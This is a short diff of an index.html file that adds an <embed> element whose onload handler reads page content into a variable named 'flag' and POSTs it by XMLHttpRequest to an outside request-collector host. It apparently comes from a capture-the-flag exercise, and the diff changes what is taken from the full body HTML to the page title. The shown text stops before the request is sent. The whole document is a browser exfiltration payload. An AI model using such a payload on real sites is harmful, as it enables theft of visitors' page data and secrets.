--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html>
  <body>
-   <embed onload="let flag = document.body.innerHTML;
+   <embed onload="let flag = document.title;
       var xhr = new XMLHttpRequest();
       xhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);
       xhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
